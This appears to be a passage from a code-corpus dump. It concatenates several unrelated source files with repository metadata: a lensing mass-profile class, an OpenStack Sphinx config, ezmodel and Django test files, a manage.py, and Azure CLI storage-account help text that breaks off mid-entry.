        return mass_2d

    def mass_2d_lens(self, r, theta_E, gamma):
        """
        :param r: projected radius
        :param theta_E: Einstein radius
        :param gamma: power-law slope
        :return: 2d projected mass enclosed within radius r
        """
        rho0 = self.theta2rho(theta_E, gamma)
        return self.mass_2d(r, rho0, gamma)

    def grav_pot(self, x, y, rho0, gamma, center_x=0, center_y=0):
        """
        Gravitational potential (modulo 4 pi G and rho0 in appropriate units).

        :param x: x-coordinate(s)
        :param y: y-coordinate(s)
        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :param center_x: x-coordinate of profile center
        :param center_y: y-coordinate of profile center
        :return: gravitational potential
        """
        x_ = x - center_x
        y_ = y - center_y
        r = np.sqrt(x_ ** 2 + y_ ** 2)
        mass_3d = self.mass_3d(r, rho0, gamma)
        pot = mass_3d / r
        return pot

    @staticmethod
    def density(r, rho0, gamma):
        """
        Computes the 3d density at radius r.

        :param r: 3d radius
        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :return: 3d density
        """
        rho = rho0 / r ** gamma
        return rho

    def density_lens(self, r, theta_E, gamma):
        """
        Computes the density at 3d radius r given the lens model
        parameterization. The integral projected in units of angles
        (i.e. arc seconds) results in the convergence quantity.

        :param r: 3d radius
        :param theta_E: Einstein radius
        :param gamma: power-law slope
        :return: 3d density
        """
        rho0 = self.theta2rho(theta_E, gamma)
        return self.density(r, rho0, gamma)

    @staticmethod
    def density_2d(x, y, rho0, gamma, center_x=0, center_y=0):
        """
        Projected (2d) density at position (x, y).

        :param x: x-coordinate(s)
        :param y: y-coordinate(s)
        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :param center_x: x-coordinate of profile center
        :param center_y: y-coordinate of profile center
        :return: projected density
        """
        x_ = x - center_x
        y_ = y - center_y
        r = np.sqrt(x_ ** 2 + y_ ** 2)
        sigma = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * r ** (1 - gamma) * rho0
        return sigma

    @staticmethod
    def _gamma_limit(gamma):
        """
        Limits the power-law slope to certain bounds.

        NOTE(review): currently a pass-through — gamma is returned unchanged.

        :param gamma: power-law slope
        :return: bounded power-law slope
        """
        return gamma
| 28.685841 | 146 | 0.518896 |
b8f5ca62b55f214730bf24e33e3a4af325b39862 | 3,249 | py | Python | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | null | null | null | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2018-08-23T00:07:14.000Z | 2018-08-27T10:10:02.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# placement-api-ref documentation build configuration file, created by
# sphinx-quickstart on Sat May 1 15:17:47 2010.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys

import pbr.version

# Resolve the package version once via pbr; reused below for the Sphinx
# |version| and |release| substitutions.
version_info = pbr.version.VersionInfo('placement')

# Make the api-ref source tree importable (for the local `ext` package).
sys.path.insert(0, os.path.abspath('../'))

# Sphinx extension modules: the OpenStack docs theme, the API-reference
# directives and the local response validator.
extensions = [
    'openstackdocstheme',
    'os_api_ref',
    'ext.validator',
]

# -- General configuration ----------------------------------------------------

# Source files are reStructuredText, rooted at `index`.
source_suffix = '.rst'
master_doc = 'index'

# General information about the project.
project = u'Placement API Reference'
copyright = u'2010-present, OpenStack Foundation'

# openstackdocstheme options
repository_name = 'openstack/placement'
use_storyboard = True

# Version information rendered into the built documents.
release = version_info.release_string()  # full version, incl. alpha/beta/rc tags
version = version_info.version_string()  # short X.Y version

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# -- Options for HTML output --------------------------------------------------

html_theme = 'openstackdocs'
html_theme_options = {
    "sidebar_mode": "toc",
}

# Format of the 'Last updated on:' timestamp inserted at every page bottom.
html_last_updated_fmt = '%Y-%m-%d %H:%M'

# -- Options for LaTeX output -------------------------------------------------

# (source start file, target name, title, author, documentclass [howto/manual])
latex_documents = [
    ('index', 'Placement.tex', u'OpenStack Placement API Documentation',
     u'OpenStack Foundation', 'manual'),
]

# -- Options for openstackdocstheme -------------------------------------------

openstack_projects = [
    'placement',
]
| 31.543689 | 79 | 0.700523 |
7479a986334cf911345532f80bba6314495d33be | 2,640 | py | Python | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | 3 | 2018-02-15T01:31:50.000Z | 2018-03-03T18:56:45.000Z | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | 15 | 2018-02-15T01:38:55.000Z | 2018-03-24T19:31:51.000Z | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from sklearn.linear_model import Ridge, Lasso, LogisticRegression, LinearRegression
from sklearn.datasets import load_boston, load_breast_cancer
from ezmodel.ezmodel import regularization_plot
def test_input_model_type():
    """regularization_plot must raise TypeError for unsupported model types."""
    features, target = load_boston(return_X_y=True)
    unsupported_model = LinearRegression()
    with pytest.raises(TypeError):
        regularization_plot(unsupported_model, alpha=1, x=features, y=target)
def test_nonzero_count_ridge():
    """A list of alphas with Ridge() must yield matching nonzero-coefficient counts."""
    features, target = load_boston(return_X_y=True)
    threshold = 1e-2
    alphas = [2**power for power in range(-2, 3)]
    expected_counts = []
    for alpha in alphas:
        fitted = Ridge(alpha=alpha).fit(features, target)
        expected_counts.append(sum(np.abs(fitted.coef_) > threshold))
    assert expected_counts == regularization_plot(Ridge(), alpha=alphas, tol=threshold, x=features, y=target)
def test_nonzero_count_lasso():
    """A list of alphas with Lasso() must yield matching nonzero-coefficient counts."""
    features, target = load_boston(return_X_y=True)
    threshold = 1e-6
    alphas = [2**power for power in range(-2, 3)]
    expected_counts = []
    for alpha in alphas:
        fitted = Lasso(alpha=alpha).fit(features, target)
        expected_counts.append(sum(np.abs(fitted.coef_) > threshold))
    assert expected_counts == regularization_plot(Lasso(), alpha=alphas, tol=threshold, x=features, y=target)
def test_nonzero_count_logistic():
    """A list of alphas with LogisticRegression() must yield matching nonzero-coefficient counts."""
    features, target = load_breast_cancer(return_X_y=True)
    threshold = 1e-5
    strengths = [2**power for power in range(-2, 3)]
    expected_counts = []
    for c in strengths:
        fitted = LogisticRegression(C=c).fit(features, target)
        expected_counts.append(sum(np.abs(fitted.coef_[0]) > threshold))
    assert expected_counts == regularization_plot(LogisticRegression(), alpha=strengths, tol=threshold, x=features, y=target)
def test_nonzero_coefs_logistic():
    """A scalar alpha must produce the correct coefficients for a LogisticRegression() model."""
    features, target = load_breast_cancer(return_X_y=True)
    threshold = 1e-7
    fitted = LogisticRegression(C=10.0**-7).fit(features, target)
    expected = []
    for coef in fitted.coef_[0]:
        # coefficients at or below the threshold are reported as exactly 0
        expected.append(np.abs(coef) if coef > threshold else 0)
    assert expected == regularization_plot(LogisticRegression(), alpha=10.0**7, x=features, y=target)
def test_nonzero_coefs_rigde():
    """A scalar float alpha must produce the correct coefficients for a Ridge() model."""
    features, target = load_boston(return_X_y=True)
    threshold = 1e-6
    fitted = Ridge(alpha=2**2.0).fit(features, target)
    expected = []
    for coef in fitted.coef_:
        # coefficients at or below the threshold are reported as exactly 0
        expected.append(np.abs(coef) if coef > threshold else 0)
    assert expected == regularization_plot(Ridge(), alpha=2**2.0, x=features, y=target)
| 40.615385 | 99 | 0.704167 |
bfbd5447f293c90d5faa94ba91266c9c7c3ef7d5 | 3,476 | py | Python | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | 1 | 2016-03-02T01:21:34.000Z | 2016-03-02T01:21:34.000Z | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | null | null | null | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | null | null | null | """
Models can have a ``managed`` attribute, which specifies whether the SQL code
is generated for the table on various manage.py operations.
"""
from django.db import models
# All of these models are created in the database by Django.
class A01(models.Model):
    # Django-managed model; its table 'A01' is created by syncdb/migrate.
    f_a = models.CharField(max_length=10, db_index=True)
    f_b = models.IntegerField()

    class Meta:
        db_table = 'A01'

    def __unicode__(self):
        return self.f_a
class B01(models.Model):
    # Django-managed model with a foreign key to the managed A01 table.
    fk_a = models.ForeignKey(A01)
    f_a = models.CharField(max_length=10, db_index=True)
    f_b = models.IntegerField()

    class Meta:
        db_table = 'B01'
        # 'managed' is True by default. This tests we can set it explicitly.
        managed = True

    def __unicode__(self):
        return self.f_a
class C01(models.Model):
    # Django-managed model whose m2m join table is explicitly named 'D01'.
    mm_a = models.ManyToManyField(A01, db_table='D01')
    f_a = models.CharField(max_length=10, db_index=True)
    f_b = models.IntegerField()

    class Meta:
        db_table = 'C01'

    def __unicode__(self):
        return self.f_a
# All of these models use the same tables as the previous set (they are shadows
# of possibly a subset of the columns). There should be no creation errors,
# since we have told Django they aren't managed by Django.
class A02(models.Model):
    # Unmanaged shadow of the 'A01' table exposing a subset of its columns.
    f_a = models.CharField(max_length=10, db_index=True)

    class Meta:
        db_table = 'A01'
        managed = False

    def __unicode__(self):
        return self.f_a
class B02(models.Model):
    # Unmanaged shadow of the 'B01' table.
    class Meta:
        db_table = 'B01'
        managed = False

    fk_a = models.ForeignKey(A02)
    f_a = models.CharField(max_length=10, db_index=True)
    f_b = models.IntegerField()

    def __unicode__(self):
        return self.f_a
# To re-use the many-to-many intermediate table, we need to manually set up
# things up.
class C02(models.Model):
    # Unmanaged shadow of 'C01'; reuses the existing m2m join table via an
    # explicit `through` model instead of letting Django create one.
    mm_a = models.ManyToManyField(A02, through="Intermediate")
    f_a = models.CharField(max_length=10, db_index=True)
    f_b = models.IntegerField()

    class Meta:
        db_table = 'C01'
        managed = False

    def __unicode__(self):
        return self.f_a
class Intermediate(models.Model):
    # Unmanaged through-model mapped onto the existing 'D01' join table;
    # db_column keeps the original A01/C01 column names.
    a02 = models.ForeignKey(A02, db_column="a01_id")
    c02 = models.ForeignKey(C02, db_column="c01_id")

    class Meta:
        db_table = 'D01'
        managed = False
#
# These next models test the creation (or not) of many to many join tables
# between managed and unmanaged models. A join table between two unmanaged
# models shouldn't be automatically created (see #10647).
#
# Firstly, we need some models that will create the tables, purely so that the
# tables are created. This is a test setup, not a requirement for unmanaged
# models.
class Proxy1(models.Model):
    # Managed model whose only purpose is to create the underlying table.
    class Meta:
        db_table = "unmanaged_models_proxy1"
class Proxy2(models.Model):
    # Managed model whose only purpose is to create the underlying table.
    class Meta:
        db_table = "unmanaged_models_proxy2"
class Unmanaged1(models.Model):
    # Unmanaged view of the table created by Proxy1.
    class Meta:
        managed = False
        db_table = "unmanaged_models_proxy1"
# Unmanged with an m2m to unmanaged: the intermediary table won't be created.
class Unmanaged2(models.Model):
    # Unmanaged model with an m2m to another unmanaged model: Django should
    # NOT auto-create the intermediary join table.
    mm = models.ManyToManyField(Unmanaged1)

    class Meta:
        managed = False
        db_table = "unmanaged_models_proxy2"
# Here's an unmanaged model with an m2m to a managed one; the intermediary
# table *will* be created (unless given a custom `through` as for C02 above).
class Managed1(models.Model):
    # Managed model with an m2m to an unmanaged model: the intermediary join
    # table WILL be created automatically.
    mm = models.ManyToManyField(Unmanaged1)
| 27.587302 | 79 | 0.686421 |
789fe3d9ed9df615d7efd0662fc6ed5d9a1a6442 | 2,741 | py | Python | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 5 | 2015-08-24T10:00:48.000Z | 2020-04-18T07:10:50.000Z | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 2 | 2017-12-28T21:36:48.000Z | 2017-12-28T21:36:57.000Z | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 2 | 2019-09-29T01:32:26.000Z | 2021-07-13T07:13:55.000Z | from django.test import TestCase
from base import SharedMemoryModel
from django.db import models
class Category(SharedMemoryModel):
name = models.CharField(max_length=32)
class RegularCategory(models.Model):
name = models.CharField(max_length=32)
class Article(SharedMemoryModel):
name = models.CharField(max_length=32)
category = models.ForeignKey(Category)
category2 = models.ForeignKey(RegularCategory)
class RegularArticle(models.Model):
name = models.CharField(max_length=32)
category = models.ForeignKey(Category)
category2 = models.ForeignKey(RegularCategory)
class SharedMemorysTest(TestCase):
# TODO: test for cross model relation (singleton to regular)
def setUp(self):
n = 0
category = Category.objects.create(name="Category %d" % (n,))
regcategory = RegularCategory.objects.create(name="Category %d" % (n,))
for n in xrange(0, 10):
Article.objects.create(name="Article %d" % (n,), category=category, category2=regcategory)
RegularArticle.objects.create(name="Article %d" % (n,), category=category, category2=regcategory)
def testSharedMemoryReferences(self):
article_list = Article.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category is last_article.category, True)
last_article = article
def testRegularReferences(self):
article_list = RegularArticle.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category2 is last_article.category2, False)
last_article = article
def testMixedReferences(self):
article_list = RegularArticle.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category is last_article.category, True)
last_article = article
article_list = Article.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category2 is last_article.category2, False)
last_article = article
def testObjectDeletion(self):
# This must execute first so its guaranteed to be in memory.
article_list = list(Article.objects.all().select_related('category'))
article = Article.objects.all()[0:1].get()
pk = article.pk
article.delete()
self.assertEquals(pk not in Article.__instance_cache__, True)
| 39.157143 | 109 | 0.680409 |
8d4ee6524d65e8e3e9c85747ea1a22e8ed346ff9 | 265 | py | Python | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project_name.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 24.090909 | 77 | 0.74717 |
cc10d218140090c05fe0605c38f3bf69e6dfa278 | 108,892 | py | Python | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps # pylint: disable=unused-import
# pylint: disable=line-too-long, too-many-lines
helps['storage'] = """
type: group
short-summary: Manage Azure Cloud Storage resources.
"""
helps['storage account'] = """
type: group
short-summary: Manage storage accounts.
"""
helps['storage account blob-service-properties'] = """
type: group
short-summary: Manage the properties of a storage account's blob service.
"""
helps['storage account blob-service-properties show'] = """
type: command
short-summary: Show the properties of a storage account's blob service.
long-summary: >
Show the properties of a storage account's blob service, including
properties for Storage Analytics and CORS (Cross-Origin Resource
Sharing) rules.
examples:
- name: Show the properties of the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties show -n mystorageaccount -g MyResourceGroup
"""
helps['storage account blob-service-properties update'] = """
type: command
short-summary: Update the properties of a storage account's blob service.
long-summary: >
Update the properties of a storage account's blob service, including
properties for Storage Analytics and CORS (Cross-Origin Resource
Sharing) rules.
parameters:
- name: --enable-change-feed
short-summary: 'Indicate whether change feed event logging is enabled. If it is true, you enable the storage account to begin capturing changes. The default value is true. You can see more details in https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-change-feed?tabs=azure-portal#register-by-using-azure-cli'
- name: --enable-delete-retention
short-summary: 'Indicate whether delete retention policy is enabled for the blob service.'
- name: --delete-retention-days
short-summary: 'Indicate the number of days that the deleted blob should be retained. The value must be in range [1,365]. It must be provided when `--enable-delete-retention` is true.'
examples:
- name: Enable the change feed for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-change-feed true -n mystorageaccount -g MyResourceGroup
- name: Enable delete retention policy and set delete retention days to 100 for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-delete-retention true --delete-retention-days 100 -n mystorageaccount -g MyResourceGroup
- name: Enable versioning for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-versioning -n mystorageaccount -g MyResourceGroup
"""
helps['storage account create'] = """
type: command
short-summary: Create a storage account.
long-summary: >
The SKU of the storage account defaults to 'Standard_RAGRS'.
examples:
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n mystorageaccount -g MyResourceGroup -l westus --sku Standard_LRS
unsupported-profiles: 2017-03-09-profile
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n mystorageaccount -g MyResourceGroup -l westus --account-type Standard_LRS
supported-profiles: 2017-03-09-profile
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the eastus2euap region with account-scoped encryption key enabled for Table Service.
text: az storage account create -n mystorageaccount -g MyResourceGroup --kind StorageV2 -l eastus2euap -t Account
"""
helps['storage account delete'] = """
type: command
short-summary: Delete a storage account.
examples:
- name: Delete a storage account using a resource ID.
text: az storage account delete --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Delete a storage account using an account name and resource group.
text: az storage account delete -n MyStorageAccount -g MyResourceGroup
"""
helps['storage account encryption-scope'] = """
type: group
short-summary: Manage encryption scope for a storage account.
"""
helps['storage account encryption-scope create'] = """
type: command
short-summary: Create an encryption scope within storage account.
examples:
- name: Create an encryption scope within storage account based on Micosoft.Storage key source.
text: |
az storage account encryption-scope create --name myencryption -s Microsoft.Storage --account-name mystorageaccount -g MyResourceGroup
- name: Create an encryption scope within storage account based on Micosoft.KeyVault key source.
text: |
az storage account encryption-scope create --name myencryption -s Microsoft.KeyVault -u "https://vaultname.vault.azure.net/keys/keyname/1f7fa7edc99f4cdf82b5b5f32f2a50a7" --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope list'] = """
type: command
short-summary: List encryption scopes within storage account.
examples:
- name: List encryption scopes within storage account.
text: |
az storage account encryption-scope list --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope show'] = """
type: command
short-summary: Show properties for specified encryption scope within storage account.
examples:
- name: Show properties for specified encryption scope within storage account.
text: |
az storage account encryption-scope show --name myencryption --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope update'] = """
type: command
short-summary: Update properties for specified encryption scope within storage account.
examples:
- name: Update an encryption scope key source to Micosoft.Storage.
text: |
az storage account encryption-scope update --name myencryption -s Microsoft.Storage --account-name mystorageaccount -g MyResourceGroup
- name: Create an encryption scope within storage account based on Micosoft.KeyVault key source.
text: |
az storage account encryption-scope update --name myencryption -s Microsoft.KeyVault -u "https://vaultname.vault.azure.net/keys/keyname/1f7fa7edc99f4cdf82b5b5f32f2a50a7" --account-name mystorageaccount -g MyResourceGroup
- name: Disable an encryption scope within storage account.
text: |
az storage account encryption-scope update --name myencryption --state Disabled --account-name mystorageaccount -g MyResourceGroup
- name: Enable an encryption scope within storage account.
text: |
az storage account encryption-scope update --name myencryption --state Enabled --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account failover'] = """
type: command
short-summary: Failover request can be triggered for a storage account in case of availability issues.
long-summary: |
The failover occurs from the storage account's primary cluster to secondary cluster for (RA-)GRS/GZRS accounts. The secondary
cluster will become primary after failover. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/common/storage-disaster-recovery-guidance.
examples:
- name: Failover a storage account.
text: |
az storage account failover -n mystorageaccount -g MyResourceGroup
- name: Failover a storage account without waiting for complete.
text: |
az storage account failover -n mystorageaccount -g MyResourceGroup --no-wait
az storage account show -n mystorageaccount --expand geoReplicationStats
"""
helps['storage account generate-sas'] = """
type: command
parameters:
- name: --services
short-summary: 'The storage services the SAS is applicable for. Allowed values: (b)lob (f)ile (q)ueue (t)able. Can be combined.'
- name: --resource-types
short-summary: 'The resource types the SAS is applicable for. Allowed values: (s)ervice (c)ontainer (o)bject. Can be combined.'
- name: --expiry
short-summary: Specifies the UTC datetime (Y-m-d'T'H:M'Z') at which the SAS becomes invalid.
- name: --start
short-summary: Specifies the UTC datetime (Y-m-d'T'H:M'Z') at which the SAS becomes valid. Defaults to the time of the request.
- name: --account-name
short-summary: 'Storage account name. Must be used in conjunction with either storage account key or a SAS token. Environment Variable: AZURE_STORAGE_ACCOUNT'
examples:
- name: Generate a sas token for the account that is valid for queue and table services on Linux.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage account generate-sas --permissions cdlruwap --account-name MyStorageAccount --services qt --resource-types sco --expiry $end -o tsv
- name: Generate a sas token for the account that is valid for queue and table services on MacOS.
text: |
end=`date -v+30M '+%Y-%m-%dT%H:%MZ'`
az storage account generate-sas --permissions cdlruwap --account-name MyStorageAccount --services qt --resource-types sco --expiry $end -o tsv
- name: Generate a shared access signature for the account (autogenerated)
text: |
az storage account generate-sas --account-key 00000000 --account-name MyStorageAccount --expiry 2020-01-01 --https-only --permissions acuw --resource-types co --services bfqt
crafted: true
"""
helps['storage account file-service-properties'] = """
type: group
short-summary: Manage the properties of file service in storage account.
"""
helps['storage account file-service-properties show'] = """
type: command
short-summary: Show the properties of file service in storage account.
long-summary: >
Show the properties of file service in storage account.
examples:
- name: Show the properties of file service in storage account.
text: az storage account file-service-properties show -n mystorageaccount -g MyResourceGroup
"""
helps['storage account file-service-properties update'] = """
type: command
short-summary: Update the properties of file service in storage account.
long-summary: >
Update the properties of file service in storage account.
examples:
- name: Enable soft delete policy and set delete retention days to 100 for file service in storage account.
text: az storage account file-service-properties update --enable-delete-retention true --delete-retention-days 100 -n mystorageaccount -g MyResourceGroup
- name: Disable soft delete policy for file service.
text: az storage account file-service-properties update --enable-delete-retention false -n mystorageaccount -g MyResourceGroup
"""
helps['storage account keys'] = """
type: group
short-summary: Manage storage account keys.
"""
helps['storage account keys list'] = """
type: command
short-summary: List the access keys or Kerberos keys (if active directory enabled) for a storage account.
examples:
- name: List the access keys for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount
- name: List the access keys and Kerberos keys (if active directory enabled) for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount --expand-key-type kerb
"""
helps['storage account keys renew'] = """
type: command
short-summary: Regenerate one of the access keys or Kerberos keys (if active directory enabled) for a storage account.
long-summary: >
Kerberos key is generated per storage account for Azure Files identity based authentication either with
Azure Active Directory Domain Service (Azure AD DS) or Active Directory Domain Service (AD DS). It is used as the
password of the identity registered in the domain service that represents the storage account. Kerberos key does not
provide access permission to perform any control or data plane read or write operations against the storage account.
examples:
- name: Regenerate one of the access keys for a storage account.
text: az storage account keys renew -g MyResourceGroup -n MyStorageAccount --key primary
- name: Regenerate one of the Kerberos keys for a storage account.
text: az storage account keys renew -g MyResourceGroup -n MyStorageAccount --key secondary --key-type kerb
"""
helps['storage account list'] = """
type: command
short-summary: List storage accounts.
examples:
- name: List all storage accounts in a subscription.
text: az storage account list
- name: List all storage accounts in a resource group.
text: az storage account list -g MyResourceGroup
"""
helps['storage account management-policy'] = """
type: group
short-summary: Manage storage account management policies.
"""
helps['storage account management-policy create'] = """
type: command
short-summary: Creates the data policy rules associated with the specified storage account.
"""
helps['storage account management-policy update'] = """
type: command
short-summary: Updates the data policy rules associated with the specified storage account.
"""
helps['storage account network-rule'] = """
type: group
short-summary: Manage network rules.
"""
helps['storage account network-rule add'] = """
type: command
short-summary: Add a network rule.
long-summary: >
Rules can be created for an IPv4 address, address range (CIDR format), or a virtual network subnet.
examples:
- name: Create a rule to allow a specific address-range.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --ip-address 23.45.1.0/24
- name: Create a rule to allow access for a subnet.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --vnet-name myvnet --subnet mysubnet
- name: Create a rule to allow access for a subnet in another resource group.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --subnet $subnetId
"""
helps['storage account network-rule list'] = """
type: command
short-summary: List network rules.
examples:
- name: List network rules. (autogenerated)
text: |
az storage account network-rule list --account-name MyAccount --resource-group MyResourceGroup
crafted: true
"""
helps['storage account network-rule remove'] = """
type: command
short-summary: Remove a network rule.
examples:
- name: Remove a network rule. (autogenerated)
text: |
az storage account network-rule remove --account-name MyAccount --resource-group MyResourceGroup --subnet MySubnetID
crafted: true
- name: Remove a network rule. (autogenerated)
text: |
az storage account network-rule remove --account-name MyAccount --ip-address 23.45.1.0/24 --resource-group MyResourceGroup
crafted: true
"""
helps['storage account or-policy'] = """
type: group
short-summary: Manage storage account Object Replication Policy.
"""
# Help entry for `az storage account or-policy create`.
# Fix: user-facing typo "trough json file" -> "through json file".
helps['storage account or-policy create'] = """
type: command
short-summary: Create Object Replication Service Policy for storage account.
examples:
  - name: Create Object Replication Service Policy for storage account.
    text: az storage account or-policy create -g ResourceGroupName -n storageAccountName -d destAccountName -s srcAccountName --destination-container dcont --source-container scont
  - name: Create Object Replication Service Policy through json file for storage account.
    text: az storage account or-policy create -g ResourceGroupName -n storageAccountName --policy @policy.json
  - name: Create Object Replication Service Policy to source storage account through policy associated with destination storage account.
    text: az storage account or-policy show -g ResourceGroupName -n destAccountName --policy-id "3496e652-4cea-4581-b2f7-c86b3971ba92" | az storage account or-policy create -g ResourceGroupName -n srcAccountName -p "@-"
"""
helps['storage account or-policy list'] = """
type: command
short-summary: List Object Replication Service Policies associated with the specified storage account.
examples:
- name: List Object Replication Service Policies associated with the specified storage account.
text: az storage account or-policy list -g ResourceGroupName -n StorageAccountName
"""
helps['storage account or-policy delete'] = """
type: command
short-summary: Delete specified Object Replication Service Policy associated with the specified storage account.
examples:
- name: Delete Object Replication Service Policy associated with the specified storage account.
text: az storage account or-policy delete -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy show'] = """
type: command
short-summary: Show the properties of specified Object Replication Service Policy for storage account.
examples:
- name: Show the properties of specified Object Replication Service Policy for storage account.
text: az storage account or-policy show -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy update'] = """
type: command
short-summary: Update Object Replication Service Policy properties for storage account.
examples:
- name: Update source storage account in Object Replication Service Policy.
text: az storage account or-policy update -g ResourceGroupName -n StorageAccountName --source-account newSourceAccount --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
- name: Update Object Replication Service Policy through json file.
text: az storage account or-policy update -g ResourceGroupName -n StorageAccountName -p @policy.json
"""
helps['storage account or-policy rule'] = """
type: group
short-summary: Manage Object Replication Service Policy Rules.
"""
helps['storage account or-policy rule add'] = """
type: command
short-summary: Add rule to the specified Object Replication Service Policy.
examples:
- name: Add rule to the specified Object Replication Service Policy.
text: az storage account or-policy rule add -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" -d destContainer -s srcContainer
"""
helps['storage account or-policy rule list'] = """
type: command
short-summary: List all the rules in the specified Object Replication Service Policy.
examples:
- name: List all the rules in the specified Object Replication Service Policy.
text: az storage account or-policy rule list -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy rule remove'] = """
type: command
short-summary: Remove the specified rule from the specified Object Replication Service Policy.
examples:
- name: Remove the specified rule from the specified Object Replication Service Policy.
